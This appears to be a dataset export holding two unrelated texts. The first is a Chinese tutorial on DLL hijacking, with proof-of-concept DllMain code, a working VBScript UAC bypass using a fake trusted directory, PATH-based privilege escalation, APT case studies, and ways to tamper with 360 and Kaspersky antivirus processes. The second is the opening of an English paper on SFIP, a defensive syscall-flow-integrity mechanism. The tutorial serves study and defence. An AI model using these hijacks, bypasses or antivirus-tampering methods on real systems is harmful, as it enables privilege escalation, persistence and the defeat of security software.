text
stringlengths 100
9.93M
| category
stringclasses 11
values |
---|---|
1
针对Dynamic Link Library(DLL)攻击⼿法的深⼊
分析
1.Dynamic Link Library基础知识
1.1.DLL的结构
1.2加载DLL
1.2.1显式加载
1.2.2隐式加载
1.3.win常⽤dll及其功能简介
1.4.DLL如何加载
2.DLL劫持可能发⽣的⼏个场景
2.1.场景1:可以直接劫持某个应⽤的DLL
2.2.场景2:不存在DLL 劫持
2.3.场景3:DLL 搜索顺序劫持
2.4.其他
3.常⻅的DLL攻击利⽤⼿法
3.1.DLL 加载劫持进⾏钓⻥维权
3.1.1.实例1 Qbot(⼜名 Qakbot 或 Pinkslipbot)劫持Calc.exe的WindowsCodecs.dll
3.1.2.实例2 Kaseya 劫持MsMpEng.exe的mpsvc.dll
3.1.3.实例3 LuminousMoth APT劫持多个DLL进⾏利⽤
3.1.4.实例4 ChamelGang APT 劫持MSDTC进⾏维权
3.1.5.实例5 利⽤劫持Update.exe的CRYPTSP.dll进⾏维权
3.2.DLL 加载劫持进⾏提权
3.2.1 劫持任务计划程序服务加载的WptsExtensions.dll通过 PATH 环境变量进⾏提权
3.2.2.通过PrivescCheck检测⽬标上是否存在DLL劫持
3.2.3.劫持winsat.exe的dxgi.dll Bypass UAC
3.3.DLL 加载劫持进⾏终端杀软强对抗
3.3.1.实例1 劫持360杀毒
3.3.2.实例2 劫持卡巴斯基的wow64log.dll
4.部分使⽤DLL 劫持的APT
2
5.参考:
by-⽹空对抗中⼼-李国聪
dll(dynamic-link library),动态链接库,是微软实现共享函数库的⼀种⽅式。动态链接,就是把⼀些常⽤
的函数代码制作成dll⽂件,当某个程序调⽤到dll中的某个函数的时候,windows系统才把dll加载到内存
中。也就是说当程序需要的时候才链接dll,所以是动态链接。
简单的说,dll有以下⼏个优点:
1) 节省内存。同⼀个软件模块,若是以源代码的形式重⽤,则会被编译到不同的可执⾏程序中,同时运
⾏这些exe时这些模块的⼆进制码会被重复加载到内存中。如果使⽤dll,则只在内存中加载⼀次,所有使
⽤该dll的进程会共享此块内存(当然,像dll中的全局变量这种东⻄是会被每个进程复制⼀份的)。
1.Dynamic Link Library基础知识
动态连接,就是把这些相通的功能、函数都放到⼀种特殊形式的windwos可执⾏⽂件中(dll),⽣成⼀
个DLL的时候,程序员需要写出,其中包含那些函数需由其他程序来访问。这个过程叫做对函数的“导
出”
创建windows程序的时候,专⻔的连接程序对程序的对象⽂件进⾏扫描,并⽣成⼀个列表,列出那些调
⽤的函数在那个DLL那个位置,指定各个函数所在位置的过程叫做对函数的“导⼊”
当程序运⾏的时候,⼀旦要求⽤到执⾏⽂件内部没有的函数,windows就会⾃动装载动态连接库,使应
⽤程序可以访问这些函数。此时,每个函数的地址都会解析出来,并且以动态的⽅式连接到程序⾥--
这便是术语“动态连接”的由来。
另外还有⼀个好处,就是当你更新你的这个函数的版本和功能的时候,静态连接所需要做的⼯作是多少
(假设按windwos来说他有上千个这样的函数,⼀共有100多个程序来使⽤,那静态连接需要100000次
的更新,动态连接只需要1000次),从⽽也节省了内存的空间。
动态连接库不⼀定是DLL扩展名的,也可以是ocx、vbx、exe、drv 等等的
3
2) 不需编译的软件系统升级,若⼀个软件系统使⽤了dll,则该dll被改变(函数名不变)时,系统升级只
需要更换此dll即可,不需要重新编译整个系统。事实上,很多软件都是以这种⽅式升级的。例如我们经
常玩的星际、魔兽等游戏也是这样进⾏版本升级的。
3) Dll库可以供多种编程语⾔使⽤,例如⽤c编写的dll可以在vb中调⽤。这⼀点上DLL还做得很不够,因
此在dll的基础上发明了COM技术,更好的解决了⼀系列问题。
包含objbase.h头⽂件(⽀持COM技术的⼀个头⽂件)。⽤windows.H也可以。
然后是⼀个DllMain函数
1.1.DLL的结构
#include <objbase.h>
#include <iostream.h>
BOOL APIENTRY DllMain(HANDLE hModule, DWORD dwReason, void* lpReserved)
{
HANDLE g_hModule;
switch(dwReason)
{
case DLL_PROCESS_ATTACH:
cout<<"Dll is attached!"<<endl;
g_hModule = (HINSTANCE)hModule;
break;
case DLL_PROCESS_DETACH:
cout<<"Dll is detached!"<<endl;
g_hModule=NULL;
break;
}
return true;
4
其中DllMain是每个dll的⼊⼝函数,如同c的main函数⼀样。
DllMain带有三个参数:
hModule
dwReason
最后⼀个参数是⼀个保留参数(⽬前和dll的⼀些状态相关,但是很少使⽤)。
编译dll需要以下两条命令:
这条命令会将cpp编译为obj⽂件,若不使⽤/c参数则cl还会试图继续将obj链接为exe,但是这⾥是⼀个
dll,没有main函数,因此会报错。不要紧,继续使⽤链接命令。
这条命令会⽣成dll_nolib.dll。
使⽤dll⼤体上有两种⽅式,显式调⽤和隐式调⽤。
这⾥⾸先介绍显式调⽤。
显式链接是应⽤程序在执⾏过程中随时可以加载DLL⽂件,也可以随时卸载DLL⽂件,这是隐式链接所⽆
法作到的,所以显式链接具有更好的灵活性,对于解释性语⾔更为合适。不过实现显式链接要麻烦⼀
些。
}
表示本dll的实例句柄
表示dll当前所处的状态,例如DLL_PROCESS_ATTACH表示dll刚刚被加载到⼀个进程中,
DLL_PROCESS_DETACH表示dll刚刚从⼀个进程中卸载。
当然还有表示加载到线程中和从线程中卸载的状态,这⾥省略。
cl /c dll_nolib.cpp
Link /dll dll_nolib.obj
1.2加载DLL
1.2.1显式加载
5
在应⽤程序中⽤LoadLibrary或MFC提供的AfxLoadLibrary显式的将⾃⼰所做的动态链接库调进来,动态
链接库的⽂件名即是上述两个函数的参数,此后再⽤GetProcAddress()获取想要引⼊的函数。
⾃此,你就可以象使⽤如同在应⽤程序⾃定义的函数⼀样来调⽤此引⼊函数了。在应⽤程序退出之前,
应该⽤FreeLibrary或MFC提供的AfxFreeLibrary释放动态链接库。下⾯是通过显式链接调⽤DLL中的
Max函数的例⼦。
编写⼀个客户端程序:dll_nolib_client.cpp
在上例中使⽤类型定义关键字typedef,定义指向和DLL中相同的函数原型指针,然后通过LoadLibray()
将DLL加载到当前的应⽤程序中并返回当前DLL⽂件的句柄,然后通过GetProcAddress()函数获取导⼊
到应⽤程序中的函数指针,函数调⽤完毕后,使⽤FreeLibrary()卸载DLL⽂件。在编译程序之前,⾸先要
将DLL⽂件拷⻉到⼯程所在的⽬录或Windows系统⽬录下。
使⽤显式链接应⽤程序编译时不需要使⽤相应的Lib⽂件。另外,使⽤GetProcAddress()函数时,可以利
⽤MAKEINTRESOURCE()函数直接使⽤DLL中函数出现的顺序号,如将GetProcAddress(hDLL,"Min")
改为GetProcAddress(hDLL, MAKEINTRESOURCE(2))(函数Min()在DLL中的顺序号是2),这样调⽤
DLL中的函数速度很快,但是要记住函数的使⽤序号,否则会发⽣错误。
#include <windows.h>
#include <cstdio>
void main(void)
{
typedef int(*pMax)(int a,int b);
typedef int(*pMin)(int a,int b);
HINSTANCE hDLL;
PMax Max
HDLL=LoadLibrary("MyDll.dll");//加载动态链接库MyDll.dll⽂件;
Max=(pMax)GetProcAddress(hDLL,"Max");
A=Max(5,8);
Printf("⽐较的结果为%d\n",a);
FreeLibrary(hDLL);//卸载MyDll.dll⽂件;
}
6
这种⽅式在程序需要dll函数时再加载dll,程序运⾏时只是载⼊主程序,打开速度快.
隐式加载就是在程序开始执⾏时就将DLL⽂件加载到应⽤程序当中。实现隐式加载很容易,只要将
导⼊函数关键字_declspec(dllimport)函数名等写到应⽤程序相应的头⽂件中就可以了。
下⾯的例⼦通过隐式链接调⽤MyDll.dll库中的Min函数。⾸先⽣成⼀个项⽬为TestDll,在
DllTest.h、DllTest.cpp⽂件中分别输⼊如下代码:
在创建DllTest.exe⽂件之前,要先将MyDll.dll和MyDll.lib拷⻉到当前⼯程所在的⽬录下⾯,也可以拷⻉到
windows的System⽬录下。如果DLL使⽤的是def⽂件,要删除TestDll.h⽂件中关键字extern "C"。
TestDll.h⽂件中的关键字Progam commit是要Visual C+的编译器在link时,链接到MyDll.lib⽂件,当
然,也可以不使⽤#pragma comment(lib,"MyDll.lib")语句,⽽直接在⼯程的Setting->Link⻚的
Object/Moduls栏填⼊MyDll.lib既可。
1.2.2隐式加载
//Dlltest.h
#include"MyDll.h"
#pragma comment(lib,"MyDll.lib")
extern "C"_declspec(dllimport) int Max(int a,int b);
extern "C"_declspec(dllimport) int Min(int a,int b);
//TestDll.cpp
#include"Dlltest.h"
void main()
{int a;
a=min(8,10)
printf("⽐较的结果为%d\n",a);
}
7
这种⽅式在程序载⼊到内存时,就把dll中的代码加载过来,这样就会有静态链接存在的问题,即如果程序⽐较
⼤的话,感觉软件打开慢.
Kernel32.dll 这个dll扩展出⼝于进程、内存、硬件、⽂件系统配置有关。
Advapi32.dll 这是⼀个与系统服务以及注册表有关的函数。
1.3.win常⽤dll及其功能简介
8
Gdi32.dll
User32.dll
msvcrt.dll
Ws2_32.dll和wsock32.dll
wininet.dll
urlmon.dll
NTDLL.dll
有关图形显示的扩展函数库。
这个库的函数可以⽤来创建和操纵windows⽤户的洁⾯组建,例如窗⼝、桌⾯、菜单、消息通知、告警
等等。
包含了c语⾔的标准库函数的执⾏库。
包含⽹络连接相关的函数。
http和ftp协议的⾼级函数。
这是⼀个wininet.dll的包装,它通常⽤来MIME类型连接和下载⽹络内容。
扩展windows本地API函数和⾏为作为在⽤户程序及核之间的转换器。程序通常不会直接从ntdll.dll引⽤
函数;ntdll.dll中的函数通常被间接的被如kernel32.dll的dll调⽤。ntdll.dll中的函数通常都是⽆⽂档的
9
在http://www.pinvoke.net/default.aspx/advapi32.ControlService中可以清楚看到DLL的调⽤实例:
我们也可以使⽤Dllexp.exe来进⾏分析Dll的导出函数及其虚拟内存地址。
https://www.nirsoft.net/utils/dll_export_viewer.html
10
我们还需要明⽩DLL是如何从⽂件夹中被应⽤加载的,在微软的⽂档中我们可以看到关于动态链接库搜
索顺序的⽂章:
简单来说就是:
应⽤程序⾃身⽬录
C:\Windows\System32
C:\Windows\System
C:\Windows
当前⼯作⽬录
系统 PATH 环境变量中的⽬录
⽤户 PATH 环境变量中的⽬录
1.4.DLL如何加载
https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order
●
●
●
●
●
●
●
11
同时我们可以看到微软定义了⼀个已知 DLL 列表
如果 DLL 在运⾏应⽤程序的 Windows 版本的已知 DLL 列表中,则系统使⽤其已知 DLL 的副本(以及已
知 DLL 的依赖 DLL,如果有的话)⽽不是搜索 DLL。
有关当前系统上已知 DLL 的列表,请参阅以下注册表项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs。
那么我们可以整理出来流程为:
12
“预搜索”中的位置以绿⾊突出显示,因为它们是安全的(从特权升级的⻆度来看)。如果 DLL 的名称与
已加载到内存中的 DLL 不对应,或者如果它不是已知的 DLL,则开始实际搜索。该程序将⾸先尝试从应
⽤程序的⽬录中加载它。如果成功,则搜索停⽌,否则继续搜索C:\Windows\System32⽂件夹,依此类
推……
Eg:notepad.exe
DLL 劫持是⼀种常⻅的⾼级攻击技术,可以⽤来提权,维权,绕过应⽤程序⽩名单功能(如
AppLocker)和钓⻥。从⼴义上讲,DLL 劫持是欺骗合法/受信任的应⽤程序加载任意 DLL。
2.DLL劫持可能发⽣的⼏个场景
13
⼀般来说⼀个应⽤在启动的时候都会加载⼀些系统的DLL和⾃身的DLL。
例如Notepad.exe
这⾥使⽤Wechat.exe进⾏演示:
使⽤Process Monitor监测⼀下bthudtask.exe的运⾏,我们可以看到加载了什么DLL。
2.1.场景1:可以直接劫持某个应⽤的DLL
14
经过分析我们把⽬标定为dbghelp.dll,这个DLL在微信⾃身的安装⽬录中,并拥有微软的证书。
那么怎么样证明可以进⾏DLL劫持利⽤?这⾥有⼀个简单的⽅法,直接del这个DLL,如果应⽤启动不起
来或者del之后使⽤Process Monitor监测⼀下来证明这个DLL是否可以利⽤。
可以利⽤之后导⼊Dllexp.exe看看导出函数
15
205个函数不是很多,⽅便利⽤我们使⽤AheadLib.exe来⾃动⽣成导出函数吧
16
然后定位到⼊⼝函数,执⾏我们想要的操作就可以。例如弹计算机
修改dbghelp.dll为dbghelpOrg.dll,然后编译新的dll为dbghelp.dll⼀起复制到原⽬录中
17
启动wechat.exe就可以看到打开了calc.exe
在Process Monitor中我们可以看到:加载了我们的DLL
18
这⾥以360安全卫⼠的360tray.exe为例⼦。
Eg:
可以看到加载了不存在的DLL
2.2.场景2:不存在DLL 劫持
19
之后的操作跟场景1不同的是我们不⽤导出原来DLL的函数,直接写⼀个新的DLL命名为wow64log.dll复
制进去就可以,在这⾥还是弹calc证明利⽤。
复制命名好的DLL到⽬标⽬录中
wow64log.dll与 WoW64 Windows 机制有关,该机制允许在 64 位 Windows 上运⾏ 32 位程序。该⼦
系统会⾃动尝试加载它,但是它不存在于任何公共 Windows 版本中。
C:\Windows\System (Windows 95/98/Me)C:\WINNT\System32 (Windows
NT/2000)C:\Windows\System32 (Windows XP,Vista,7,8,10)如果是64位⽂件
C:\Windows\SysWOW64
作为管理员,我们可以构造恶意 wow64log.dll ⽂件复制到 System32 。
20
在PROCESS MONITOR中监测360安全卫⼠的主要进程发现我们的恶意DLL加载到了进程内存中,也就
是说漏洞利⽤成功;
21
这⾥以wechat.exe为例⼦,使⽤Process Monitor监测⼀下进程的DLL调⽤。我们把⽬标放在
CRYPTSP.dll中,我们可以看到:
可以看到wechat.exe先是搜索了微信安装⽬录\WeChat\和\WeChat\[3.7.5.23]\然后
C:\Windows\SysWOW64\中才找到了这个DLL
那么从理论上说我们可以在微信的安装⽬录中放⼀个我们的DLL来给wechat.exe查找到并把我们的dll加
载到进程内存中。
2.3.场景3:DLL 搜索顺序劫持
22
编译之后复制到微信的安装⽬录中
然后启动wechat.exe,弹出了calc.
23
同时在Process Monitor看到了Wechat.exe成功加载了我们的DLL
2.4.其他
24
WinSxS DLL 替换:将⽬标DLL 的相关WinSxS ⽂件夹中的合法DLL 替换为恶意DLL。通常称为 DLL 侧
加载 。
相对路径 DLL 劫持:将合法应⽤程序与恶意 DLL ⼀起复制(并可选择重命名)到⽤户可写⽂件夹。
这⾥不过多讨论。
在渗透测试和APT攻击中对DLL劫持⽐较常⽤的操作就是利⽤来进⾏钓⻥和权限维持了。
这⾥我们来分析⼀下APT中使⽤的⼿法来更好了解DLL劫持在钓⻥维权中的作⽤。
Qbot在钓⻥中⼀共会投放以下⽂件:
3.常⻅的DLL攻击利⽤⼿法
3.1.DLL 加载劫持进⾏钓⻥维权
3.1.1.实例1 Qbot(⼜名 Qakbot 或 Pinkslipbot)劫持Calc.exe的
WindowsCodecs.dll
LNK ⽂件:TXRTN_8468190
WindowsCodecs.dll - Windows ⽂件
Calc.exe - 具有隐藏属性的合法 Windows ⽂件
25
执⾏ LNK ⽂件后,它会启动“Calc.exe”。在执⾏“Calc.exe”时,会加载包含恶意代码的名
为“WindowsCodecs.dll”的⽂件(DLL劫持加载)。然后触发加载真正的⽊⻢⽂件102755.dll。
在Kaseya的⽊⻢投放的过程中通过投放MsMpEng.exe和mpsvc.dll进⾏利⽤,MsMpEng.exe是属于
Windows Defender⾃动保护服务的核⼼进程,包括在Microsoft AntiSpywaresoftware的⼯具组件中。
102755.dll - 具有隐藏属性的 Qbot DLL
3.1.2.实例2 Kaseya 劫持MsMpEng.exe的mpsvc.dll
26
在启动的过程中会加载mpsvc.dll绕过杀毒软件的监测执⾏恶意代码。
在LuminousMoth APT针对缅甸交通运输部,缅甸对外经济关系部的钓⻥攻击中我们可以看到:分
别使⽤了sllauncher.exe(APT修改名字为:igfxem.exe”)劫持加载的version.dll和winword.exe劫
持加载的wwlib.dll。其中“version.dll”的⽬的是传播到可移动设备,⽽“wwlib.dll”的⽬的是下载
Cobalt Strike beacon。
3.1.3.实例3 LuminousMoth APT劫持多个DLL进⾏利⽤
27
在“winword.exe”以加载下⼀阶段wwlib.dll中还会通过添加“Opera Browser Assistant”作为运⾏
键来修改注册表,从⽽在系统启动时使⽤“assist”参数实现持久性和执⾏恶意软件。
MSDTC 是⼀个 Windows 服务,负责协调数据库(SQL 服务器)和 Web 服务器之间的事务。msdtc 服
务启动时会搜索 3 个 DLL,oci.dll、SQLLib80.dll和xa80.dll,默认情况下 Windows 系统⽬录中不存在这
些 DLL,其中⼀个是名为 oci.dll 的 Oracle 库。恶意 DLL 被放⼊ Windows 系统⽬录并重命名为 oci.dll,
从⽽导致它被 msdtc 服务加载。对应服务为MSDTC,全称Distributed Transaction Coordinator,
Windows系统默认启动该服务
3.1.4.实例4 ChamelGang APT 劫持MSDTC进⾏维权
28
那么在劫持了msdtc的DLL情况下,msdtc服务启动下就会加载恶意的DLL达到维权的⽬的。
Update.exe是Microsoft Teams 的⼀部分,因此由 Microsoft 签名。
默认安装会在 Windows 注册表中设置⼀个 Run 键,每次⽤户登录时都会⾃动启动应⽤程序。
3.1.5.实例5 利⽤劫持Update.exe的CRYPTSP.dll进⾏维权
3.2.DLL 加载劫持进⾏提权
29
在任务计划程序服务运⾏中加载了⼀个不存在的DLL
那么攻击者可以制作⼀个在加载时执⾏代码的特定 DLL 来进⾏利⽤
通过分析PATH 环境变量可以发现C:\python27-x64⽂件夹可以写⼊
3.2.1 劫持任务计划程序服务加载的WptsExtensions.dll通过 PATH 环境变量
进⾏提权
30
重命名 DLL 为WptsExtensions.dll然后写⼊到⽬标⽬录
当系统重新启动或服务重新启动时,应⽤程序将以“NT_AUTHORITY\SYSTEM”权限启动 cmd.exe。
31
脚本表示cdpsgshims.dll和WptsExtensions.dll都存在可能通过%PATH%⽬录被劫持,从⽽可能存在提
权
我们可以看看这个DLL
Name Description RunAs RebootRequired
---- ----------- ----- --------------
cdpsgshims.dll Loaded by CDPSvc upon service startup NT AUTHORITY\LocalService
True
通过百度我们知道:
CDPSvc为 Connected Devices Platform Service连接设备平台服务 ,该服务在连接外围设备和外部设
备时开始起作⽤。它与蓝⽛、打印机和扫描仪以及⾳乐播放器、存储设备、⼿机、相机和许多其他类型
3.2.2.通过PrivescCheck检测⽬标上是否存在DLL劫持
Import-Module .\PrivescCheck.ps1
Invoke-HijackableDllsCheck
32
的连接设备相关联。它为 PC 和智能⼿机等设备提供了⼀种在彼此之间发现和发送消息的⽅式。
Display name – Connected Devices Platform Service
Path – %WinDir%\system32\svchost.exe -k LocalService -p
File – %WinDir%\System32\CDPSvc.dll
在ProcessMonitor中可以看到服务找不到cdpsgshims.dll的情况
在环境变量中我们可以看到配置
33
那么基本错误配置了PATH的值,然后看⼀下ACL发现低权限⽤户可以写⼊
34
把我们的恶意DLL复制进去就可以了,可以看到成功加载了我们的DLL
35
⽤户帐户控制(UAC)作为 Windows Vista 中的⼀项安全功能被引⼊,在以正常权限运⾏的进程被提升到
更⾼权限之前,要求⽤户通过提示进⾏确认。在⽤户抱怨在执⾏任意任务时被 UAC 提示淹没后,微软在
Windows 7 中引⼊了⾃动提升功能,如果某些进程位于受信任的⽬录(例如c:\windows\system32),
那么会⾃动提升。
winsat.exe是⼀款Windows 系统评估⼯具。适⽤于Windows系统,我们需要劫持的DLL为:dxgi.dll。
3.2.3.劫持winsat.exe的dxgi.dll Bypass UAC
36
但是⾃动提升可执⾏⽂件和⾃定义 DLL 都需要位于受信任⽬录中,但这些都不是普通⽤户权限可写的。
那么我们需要使⽤尾随空格模拟受信任的⽬录来利⽤,我们可以使⽤VB来新建⼀个带有尾随空格的⽂件
夹。
Set oFSO = CreateObject("Scripting.FileSystemObject")
Set wshshell = wscript.createobject("WScript.Shell")
' Get target binary and payload
WScript.StdOut.Write("System32 binary: ")
strBinary = WScript.StdIn.ReadLine()
WScript.StdOut.Write("Path to your DLL: ")
strDLL = WScript.StdIn.ReadLine()
' Create folders
Const target = "c:\windows \"
target_sys32 = (target & "system32\")
target_binary = (target_sys32 & strBinary)
If Not oFSO.FolderExists(target) Then oFSO.CreateFolder target End If
If Not oFSO.FolderExists(target_sys32) Then oFSO.CreateFolder target_sys32 End If
' Copy legit binary and evil DLL
oFSO.CopyFile ("c:\windows\system32\" & strBinary), target_binary
oFSO.CopyFile strDLL, target_sys32
' Run, Forrest, Run!
wshshell.Run("""" & target_binary & """")
' Clean files
WScript.StdOut.Write("Clean up? (press enter to continue)")
WScript.StdIn.ReadLine()
37
强对抗的意思是直接和杀毒软件进⾏对抗(操作杀毒软件的内存)⽽不是进⾏绕过杀毒软件(免杀)。
理论上说所有的windows应⽤都存在DLL劫持的情况,杀毒软件也不可避免。这⾥以360杀毒为例:
在360杀毒运⾏的过程中⼀共有以下进程:
ProcessMonitor监测⼀下进程的运⾏情况。经过分析我们可以把⽬标定为这个DLL
wshshell.Run("powershell /c ""rm -r """"\\?\" & target & """""""") 'Deletion using VBScript is
problematic, use PowerShell instead
3.3.DLL 加载劫持进⾏终端杀软强对抗
3.3.1.实例1 劫持360杀毒
38
mdnsnsp.dll⽂件属于Bonjour软件包的DLL⽂件,Bonjour(Windows 版)软件包提供了Bonjour 零配置
联⽹服务,可供 Windows 应⽤程序使⽤,如、Safari 以及“Airport 实⽤⼯具”。默认在Windows中并不
存在。那么我们可以编译恶意的DLL复制在C:\Program Files\Bonjour路径中。
如果360sd.exe加载了这个dll,就启动CMD
39
40
通过修改DLL中的代码我们还可以利⽤360杀毒加载我们的shellcode和提权,维权。在360杀毒的内存中
执⾏操作很安全。
Kaspersky AVP.exe 中的 DLL 注⼊允许本地管理员在不知道 Kaspersky 密码的情况下杀死或篡改防病毒
软件和在⾼权限中执⾏命令。通过DLL植⼊恶意⽂件,本地Windows管理员可以在这个受信任的
AVP.exe进程的上下⽂中实现代码执⾏并杀死其他进程,从⽽在⽆法检测和清除病毒的杀毒软件上实现拒
绝服务和以卡巴斯基的身份执⾏任意命令。
AVP.exe 加载不存在的wow64log.dll,路径为C:\windows\System32\
3.3.2.实例2 劫持卡巴斯基的wow64log.dll
41
Avpui.exe同样加载不存在的Wow64log.dll,路径为C:\windows\System32\
kpm.exe同样加载不存在的Wow64log.dll,路径为C:\windows\System32\
作为管理员,我们可以构造恶意 wow64log.dll ⽂件复制到 System32 。
例如:
#include "pch.h"
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <iostream>
#include <map>
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcess(TEXT("C:\\Windows\\System32\\calc.exe"), NULL, NULL, NULL, false, 0,
NULL, NULL, &si, &pi);
42
⼿动复制在⽬标⽂件⽬录中,然后启动卡巴斯基,可以看到加载了我们的Wow64log.dll
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
char szFileName[MAX_PATH + 1];
GetModuleFileNameA(NULL, szFileName, MAX_PATH + 1);
//check if we are injected in an interesting McAfee process
if (strstr(szFileName, "avp") != NULL
//|| strstr(szFileName, "mcshield") != NULL
|| strstr(szFileName, "avp.exe") != NULL
) {
DisableThreadLibraryCalls(hModule);
}
else
{
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
//log("detach");
break;
}
return TRUE;
}
43
启动Kaspersky Password Manager Service
加载了我们的恶意DLL并执⾏了
44
卡巴斯基具有⾃我保护机制,即使管理员也⽆法终⽌或注⼊Avp.exe /avpui.exe等等 进程。但似乎卡巴
斯基家族的所有进程都认为其他卡巴斯基进程在⾃我保护⽅⾯是“受信任的”。因此,如果我们设法在⼀
个上下⽂中执⾏代码,我们就可以“攻击”并杀死其进程和在卡巴斯基中执⾏任意命令等等。
我们可以编译⼀个恶意的dll利⽤卡巴斯基的进程去kill其它卡巴斯基的进程。
也可以在卡巴是安全上下⽂中执⾏我们的shellcode 例如:
45
也可以在卡巴是安全上下⽂中执⾏我们的shellcode 例如:
APT41:使⽤搜索顺序劫持
FinFisher:变种使⽤ DLL 搜索顺序劫持
Chaes:搜索顺序劫持以加载恶意 DLL 有效负载
Astaroth:使⽤搜索顺序劫持来启动⾃⼰
BOOSTWRITE:利⽤加载合法的 .dll ⽂件
BackdoorDipolomacy:使⽤搜索顺序劫持
HinKit:搜索顺序劫持⼀种持久性机制
Downdelph:通过搜索顺序劫持.exe⽂件来提升权限
InvisiMole:搜索顺序劫持在启动期间启动受感染的 DLL
HTTPBrowser:⼲扰 DLL 加载顺序
4.部分使⽤DLL 劫持的APT
46
Ramsey:劫持过时的 Windows 应⽤程序
menuPass:使⽤ DLL 搜索顺序劫持
ThreatGroup-3390:使⽤ DLL 搜索顺序劫持来分发有效负载
Whitefly:搜索顺序劫持感染恶意DLL
RTM:搜索订单劫持以⼲扰 TeamViewer
Tonto 团队:⼲扰合法的 Microsoft 可执⾏⽂件以加载恶意 DLL
Melcoz:使⽤ DLL 劫持绕过安全控制
https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order
https://itm4n.github.io/windows-dll-hijacking-clarified/
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
https://itm4n.github.io/windows-server-netman-dll-hijacking/
https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-
24a96675f6e
5.参考: | pdf |
Go With the Flow: Enforcing Program Behavior
Through Syscall Sequences and Origins
Claudio Canella
[email protected]
Abstract
As the number of vulnerabilities continues to increase every year, we require
more and more methods of constraining the applications that run on our sys-
tems. Control-Flow Integrity [1] (CFI) is a concept that constrains an applica-
tion by limiting the possible control-flow transfers it can perform, i.e., control
flow can only be re-directed to a set of previously determined locations within
the application. However, CFI only applies within the same security domain,
i.e., only within kernel or userspace. Linux seccomp [4], on the other hand,
restricts an application’s access to the syscall interface exposed by the operat-
ing system. However, seccomp can only restrict access based on the requested
syscall, but not whether it is allowed in the context of the previous one.
This talk presents our concept of syscall-flow-integrity protection (SFIP),
which addresses these shortcomings. SFIP is built upon three pillars: a state
machine representing valid transitions between syscalls, a syscall-origin map
that identifies locations from where each syscall can originate, and the sub-
sequent enforcement by the kernel.
We discuss these three pillars and how
our automated toolchain extracts the necessary information. Finally, we evalu-
ate the performance and security of SFIP. For the performance evaluation, we
demonstrate that SFIP only has a marginal runtime overhead of less than 2 %
in long-running applications like nginx or memcached. In the security evalu-
ation, we first discuss the provided security of the first pillar, i.e., the syscall
state machine. We show that SFIP reduces the number of possible syscall tran-
sitions significantly compared to Linux seccomp.. In nginx, each syscall can,
on average, reach 39 % fewer syscalls than with seccomp-based protection. We
also evaluate the provided security of the second pillar, i.e., the syscall-origin
map. By enforcing the syscall origin, we eliminate shellcode entirely while con-
straining syscalls executed during a Return-Oriented Programming attack to
legitimate locations.
1
Overview
This whitepaper covers our talk’s topics and provides technical background.
The whitepaper is a pre-print of our paper “SFIP: Coarse-Grained Syscall-Flow-
Integrity Protection in Modern Systems” [2]. It presents our talk’s content in
more detail, such as the three pillars of SFIP and the challenges in automatically
extracting the required information. It also provides detailed information on
how our implementation solves these challenges in our public proof-of-concept [3]
as well as a more detailed evaluation. We also discuss how such systems can be
further improved by extracting thread- or signal-specific syscall transitions and
outlines the idea for a more fine-grained construction of the syscall transitions.
The main takeaways of both the talk and the whitepaper are as follows.
1. Protecting the syscall interface is important for security and requires more
sophisticated approaches than currently available.
2. Automatically extracting the necessary information is challenging but fea-
sible.
3. Enforcing the extracted information can be done with a minimal runtime
overhead while significantly reducing the number of syscall transitions and
origins.
References
[1] Abadi, M., Budiu, M., Erlingsson, U., and Ligatti, J. Control-Flow
Integrity. In CCS (2005).
[2] Canella, C., Dorn, S., Gruss, D., and Schwarz, M.
SFIP:
Coarse-Grained Syscall-Flow-Integrity Protection in Modern Systems.
arXiv:2202.13716 (2022).
[3] Canella, C., Dorn, S., and Schwarz, M.
SFIP/SFIP, https://
github.com/SFIP/SFIP 2022.
[4] Edge, J. A seccomp overview, https://lwn.net/Articles/656307/ 2015.
SFIP: Coarse-Grained Syscall-Flow-Integrity Protection in Modern
Systems
Abstract
Control-Flow Integrity (CFI) is one promising mitiga-
tion that is more and more widely deployed and prevents
numerous exploits. However, CFI focuses purely on one
security domain, and transitions between user space and
kernel space are not protected. Furthermore, if user-
space CFI is bypassed, the system and kernel interfaces
remain unprotected, and an attacker can run arbitrary
transitions.
In this paper, we introduce the concept of syscall-flow-
integrity protection (SFIP) that complements the concept
of CFI with integrity for user-kernel transitions. Our
proof-of-concept implementation relies on static analy-
sis during compilation to automatically extract possible
syscall transitions. An application can opt-in to SFIP
by providing the extracted information to the kernel for
runtime enforcement. The concept is built on three fully-
automated pillars: First, a syscall state machine, repre-
senting possible transitions according to a syscall digraph
model. Second, a syscall-origin mapping, which maps
syscalls to the locations at which they can occur. Third,
an efficient enforcement of syscall-flow integrity in a mod-
ified Linux kernel. In our evaluation, we show that SFIP
can be applied to large scale applications with minimal
slowdowns. In a micro- and a macrobenchmark, it only
introduces an overhead of 13.1 % and 7.4 %, respectively.
In terms of security, we discuss and demonstrate its ef-
fectiveness in preventing control-flow-hijacking attacks
in real-world applications. Finally, to highlight the re-
duction in attack surface, we perform an analysis of the
state machines and syscall-origin mappings of several
real-world applications. On average, SFIP decreases the
number of possible transitions by 41.5 % compared to
seccomp and 91.3 % when no protection is applied.
1. Introduction
Vulnerablities in applications can be exploited by an at-
tacker to gain arbitrary code execution within the applica-
tion [62]. Subsequently, the attacker can exploit further
vulnerabilities in the underlying system to elevate priv-
ileges [37]. Such attacks can be mitigated in either of
these two stages: the stage where the attacker takes over
control of a victim application [62, 13], or the stage where
the attacker exploits a bug in the system to elevate privi-
leges [36, 38]. Researchers and industry have focused on
eliminating the first stage, where an attacker takes over
control of a victim application, by reducing the density
of vulnerabilities in software, e.g., by enforcing memory
safety [62, 13]. The second line of defense, protecting the
system, has also been studied extensively [36, 38, 22, 61].
For instance, sandboxing is a technique that tries to limit
the available resources of an application, reducing the
remaining attack surface. Ideally, an application only has
the bare minimum of resources, e.g., syscalls, that are
